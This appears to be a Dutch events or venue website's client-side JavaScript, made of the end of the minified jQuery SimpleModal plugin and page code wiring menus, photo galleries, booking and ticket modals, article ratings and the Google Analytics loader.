'document.body.scrollHeight > document.body.clientHeight ? document.body.scrollHeight : document.body.clientHeight + "px"');g.setExpression("width",'document.body.scrollWidth > document.body.clientWidth ? document.body.scrollWidth : document.body.clientWidth + "px"')}else{var e;if(b&&b.constructor===Array){c=b[0]?typeof b[0]==="number"?b[0].toString():b[0].replace(/px/,""):h.css("top").replace(/px/,"");c=c.indexOf("%")===-1?c+' + (t = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"':
parseInt(c.replace(/%/,""))+' * ((document.documentElement.clientHeight || document.body.clientHeight) / 100) + (t = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"';if(b[1]){e=typeof b[1]==="number"?b[1].toString():b[1].replace(/px/,"");e=e.indexOf("%")===-1?e+' + (t = document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft) + "px"':parseInt(e.replace(/%/,""))+' * ((document.documentElement.clientWidth || document.body.clientWidth) / 100) + (t = document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft) + "px"'}}else{c=
'(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (t = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"';e='(document.documentElement.clientWidth || document.body.clientWidth) / 2 - (this.offsetWidth / 2) + (t = document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft) + "px"'}g.removeExpression("top");g.removeExpression("left");g.setExpression("top",
c);g.setExpression("left",e)}}})},focus:function(a){var b=this;a=a&&d.inArray(a,["first","last"])!==-1?a:"first";var c=d(":input:enabled:visible:"+a,b.d.wrap);setTimeout(function(){c.length>0?c.focus():b.d.wrap.focus()},10)},getDimensions:function(){var a=d(window);return[d.browser.opera&&d.browser.version>"9.5"&&d.fn.jquery<"1.3"||d.browser.opera&&d.browser.version<"9.5"&&d.fn.jquery>"1.2.6"?a[0].innerHeight:a.height(),a.width()]},getVal:function(a,b){return a?typeof a==="number"?a:a==="auto"?0:
a.indexOf("%")>0?parseInt(a.replace(/%/,""))/100*(b==="h"?f[0]:f[1]):parseInt(a.replace(/px/,"")):null},update:function(a,b){var c=this;if(!c.d.data)return false;c.d.origHeight=c.getVal(a,"h");c.d.origWidth=c.getVal(b,"w");c.d.data.hide();a&&c.d.container.css("height",a);b&&c.d.container.css("width",b);c.setContainerDimensions();c.d.data.show();c.o.focus&&c.focus();c.unbindEvents();c.bindEvents()},setContainerDimensions:function(){var a=this,b=k||m,c=a.d.origHeight?a.d.origHeight:d.browser.opera?
a.d.container.height():a.getVal(b?a.d.container[0].currentStyle.height:a.d.container.css("height"),"h");b=a.d.origWidth?a.d.origWidth:d.browser.opera?a.d.container.width():a.getVal(b?a.d.container[0].currentStyle.width:a.d.container.css("width"),"w");var h=a.d.data.outerHeight(true),g=a.d.data.outerWidth(true);a.d.origHeight=a.d.origHeight||c;a.d.origWidth=a.d.origWidth||b;var e=a.o.maxHeight?a.getVal(a.o.maxHeight,"h"):null,i=a.o.maxWidth?a.getVal(a.o.maxWidth,"w"):null;e=e&&e<f[0]?e:f[0];i=i&&i<
f[1]?i:f[1];var j=a.o.minHeight?a.getVal(a.o.minHeight,"h"):"auto";c=c?a.o.autoResize&&c>e?e:c<j?j:c:h?h>e?e:a.o.minHeight&&j!=="auto"&&h<j?j:h:j;e=a.o.minWidth?a.getVal(a.o.minWidth,"w"):"auto";b=b?a.o.autoResize&&b>i?i:b<e?e:b:g?g>i?i:a.o.minWidth&&e!=="auto"&&g<e?e:g:e;a.d.container.css({height:c,width:b});a.d.wrap.css({overflow:h>c||g>b?"auto":"visible"});a.o.autoPosition&&a.setPosition()},setPosition:function(){var a=this,b,c;b=f[0]/2-a.d.container.outerHeight(true)/2;c=f[1]/2-a.d.container.outerWidth(true)/
2;if(a.o.position&&Object.prototype.toString.call(a.o.position)==="[object Array]"){b=a.o.position[0]||b;c=a.o.position[1]||c}else{b=b;c=c}a.d.container.css({left:c,top:b})},watchTab:function(a){var b=this;if(d(a.target).parents(".simplemodal-container").length>0){b.inputs=d(":input:enabled:visible:first, :input:enabled:visible:last",b.d.data[0]);if(!a.shiftKey&&a.target===b.inputs[b.inputs.length-1]||a.shiftKey&&a.target===b.inputs[0]||b.inputs.length===0){a.preventDefault();b.focus(a.shiftKey?"last":
"first")}}else{a.preventDefault();b.focus()}},open:function(){var a=this;a.d.iframe&&a.d.iframe.show();if(d.isFunction(a.o.onOpen))a.o.onOpen.apply(a,[a.d]);else{a.d.overlay.show();a.d.container.show();a.d.data.show()}a.o.focus&&a.focus();a.bindEvents()},close:function(){var a=this;if(!a.d.data)return false;a.unbindEvents();if(d.isFunction(a.o.onClose)&&!a.occb){a.occb=true;a.o.onClose.apply(a,[a.d])}else{if(a.d.placeholder){var b=d("#simplemodal-placeholder");if(a.o.persist)b.replaceWith(a.d.data.removeClass("simplemodal-data").css("display",
a.display));else{a.d.data.hide().remove();b.replaceWith(a.d.orig)}}else a.d.data.hide().remove();a.d.container.hide().remove();a.d.overlay.hide();a.d.iframe&&a.d.iframe.hide().remove();setTimeout(function(){a.d.overlay.remove();a.d={}},10)}}}})(jQuery);




	$(document).ready(function() {
							   
        $('ul.sf-menu').superfish();
		
		presentationCycle.init()		;

	if ($('.photo-list').length){
		$('.photo-list').each(function(index) {	   
			$.featureList(
				$('#' + $(this).attr('id') + " .tabs li a"),
				$('#' + $(this).attr('id') + " .output li"), {
					start_item	:	0
				}
			);
		});		

	}

	//Cufon.replace('#boombox h2', { fontFamily: 'Antenna' });
	//Cufon.replace('#menu a', { fontFamily: 'Antenna', hover:true});
	//Cufon.replace('.order, .sold-out, .cancelled', { fontFamily: 'Antenna', hover:true});	
	//Cufon.replace('h2, .date, h3', { fontFamily: 'Antenna' });								   
							   
		var fldFromName = $("#fldFromName"),
			fldFromEmail = $("#fldFromEmail"),
			fldToName = $("#fldToName"),
			fldToEmail = $("#fldToEmail"),			
			allFields = $([]).add(fldFromName).add(fldFromEmail).add(fldToName).add(fldToEmail),
			tips = $("#validateTips");

		$(".more").click(function(event){
  			event.preventDefault(); 
			$($(this).attr("href")).slideDown("slow");
			$(this).hide();			
			
		});

		$("area").click(function () { 
			$(this).blur();
		});
		$(".close-button").click(function () { 

					// On hovering out slide subnav menus back up
					$(this).parent().parent().parent().find("div.sub-menu").slideUp(400,function(){$("#main-menu li a.hovering").removeClass("hovering")});

		});		
		
		function checkLength(o,n,min,max) {

			if ( o.val().length > max || o.val().length < min ) {
				o.addClass('ui-state-error');
				updateTips("Length of " + n + " must be between "+min+" and "+max+".");
				return false;
			} else {
				return true;
			}

		}

		function checkRegexp(o,regexp,n) {

			if ( !( regexp.test( o.val() ) ) ) {
				o.addClass('ui-state-error');
				updateTips(n);
				return false;
			} else {
				return true;
			}
		}

		$(".preview-strip img").click(function(event) {
			event.preventDefault() ;
		   	var  q  = $(this).attr("id").replace("tn-","");
			$("#photo-gallery").modal({
					containerCss:{
						backgroundColor:"#141514",
						borderColor:"#666",
						height:470,
						padding:0,
						width:620
						
					},
					overlayClose:false,
					onShow:function(){
						var gal = $('#photos2').galleryView({
							start: q,
							panel_width: 620,
							panel_height: 410,
							frame_width: 80,
							frame_height: 50,
							transition_speed: 350,
							transition_interval: 0
						});	
					}
				});	

		});	
		//binnen .previewstrip trim(Replace(arDataReader(4,i) & " ",".jpg","_thumb.jpg"))
		
		$(".gallery-overview a").click(function(event) {
			event.preventDefault() ;
			var u = $(this).attr("href")
			var regex = new RegExp("-([0-9]*)\.html");
			var tmp = regex.exec(u);			
			var id= tmp[1]	
			$.get("/app/gallery.asp?id=" + id, function(data) {
			  $('#photo-gallery').html(data);
				// Stap 4 : Div laden als photoplayer in de popup
				$("#photo-gallery").modal({
						containerCss:{
							backgroundColor:"#141514",
							borderColor:"#666",
							height:470,
							padding:0,
							width:620
						},
						overlayClose:false,
						onShow:function(){
							var gal = $('#photos2').galleryView({
								start: 0,
								panel_width: 620,
								panel_height: 410,
								frame_width: 80,
								frame_height: 50,
								transition_speed: 350,
								transition_interval: 0
							});	
						}
					});				  
			});
		});	


		$('#photos').galleryView({
			panel_width: 620,
			panel_height: 410,
			frame_width: 80,
			frame_height: 50,
      		transition_speed: 350,
			transition_interval: 0
		});		

							   
							   
		jQuery('#link-tell-a-friend').click(function(event) {
			event.preventDefault() 
			//$('#tell-a-friend-dialog').dialog('open');
		})

		jQuery("#s").focus(function () { 
			if (jQuery(this).val() == 'Search') jQuery(this).val('');	
		});
	
		
		jQuery(".video-result .video-preview a img").hover( 
			function () { 
				jQuery(this).attr("src","/images/headerNav/1-over.gif");
				jQuery(this).attr("src","/images/video_play.png");
			}, 
			function () { 
				jQuery(this).attr("src","/images/spacer.gif");	  
			} 
		); 	
		
	  jQuery('.rating ul li a').bind('click', function(event){
		   var u = jQuery(this).attr('href') + "&auth=1";												   
		   jQuery.post(u, function(data){
			  alert("Thank you for rating this article, the avarage rating is now " + data);
		   });
		 event.preventDefault();
	   });			
		jQuery('#lnk-bookmark').click(function(event) {
			event.preventDefault() ;
			addToFavorites();
		})
		jQuery('#lnk-homepage').click(function(event) {
			event.preventDefault() ;
			setHome();
		})		
		
		$('.slideshow').cycle({
			fx: 'fade' // choose your transition type, ex: fade, scrollUp, shuffle, etc...
		});		


		$(".order1").click(function(event) {
			event.preventDefault() ;
			$.modal('', {
				closeHTML:"Sluiten",
				containerCss:{
					backgroundColor:"#fff",
					borderColor:"#666",
					height:600,
					padding:0,
					width:500
					
				},
				overlayClose:false
			});

		});
		


		$(".paylogic").click(function(event) {
			event.preventDefault() ;
			$.modal('<iframe src="' + $(this).attr("href") + '" height="600" width="500" style="border:10">', {
				containerCss:{
					backgroundColor:"#fff",
					borderColor:"#666",
					height:600,
					padding:0,
					width:500
					
				},
				overlayClose:false
			});

		});		

		$("#s").focus(function () { 
			if ($(this).val() == 'Trefwoord') $(this).val('');	
		});
		$("#menu .inner").clone().prependTo("#footer-navigation .inner");

      	
    $('.reserveren td.available, .reserveren td.option').click(function() {
			event.preventDefault() ;
			alert($(this).attr('id')) 
			$.modal('/reserveren/?slot=' + $(this).attr('id'), {
				containerCss:{
					backgroundColor:"#fff",
					borderColor:"#666",
					height:600,
					padding:0,
					width:500
					
				},
				overlayClose:false
			});
    });

	jQuery("object").each(function (i, v) {
	var elEmbed = jQuery(this).children("embed");
	if(typeof (elEmbed.get(0)) != "undefined") {
		if(typeof (elEmbed.get(0).outerHTML) != "undefined") {
			elEmbed.attr("wmode", "transparent");
			jQuery(this.outerHTML).insertAfter(this);
			jQuery(this).remove();
		}
		return true;
	}
	var algo = this.attributes;
	var str_tag = '<OBJECT ';
	for (var i=0; i < algo.length; i++) str_tag += algo[i].name + '="' + algo[i].value + '" ';	
	str_tag += '>';
	var flag = false;
	jQuery(this).children().each(function (elem) {
		if(this.nodeName == "PARAM") {
			if (this.name == "wmode") {
				flag=true;
				str_tag += '<PARAM NAME="' + this.name + '" VALUE="transparent">';		
			}
			else  str_tag += '<PARAM NAME="' + this.name + '" VALUE="' + this.value + '">';
		}
	});
	if(!flag)
		str_tag += '<PARAM NAME="wmode" VALUE="transparent">';		
	str_tag += '</OBJECT>';
	jQuery(str_tag).insertAfter(this);
	jQuery(this).remove();

	});

		
    });


  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-20965376-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();



var ord = Math.random()*10000000000000000;
	
	

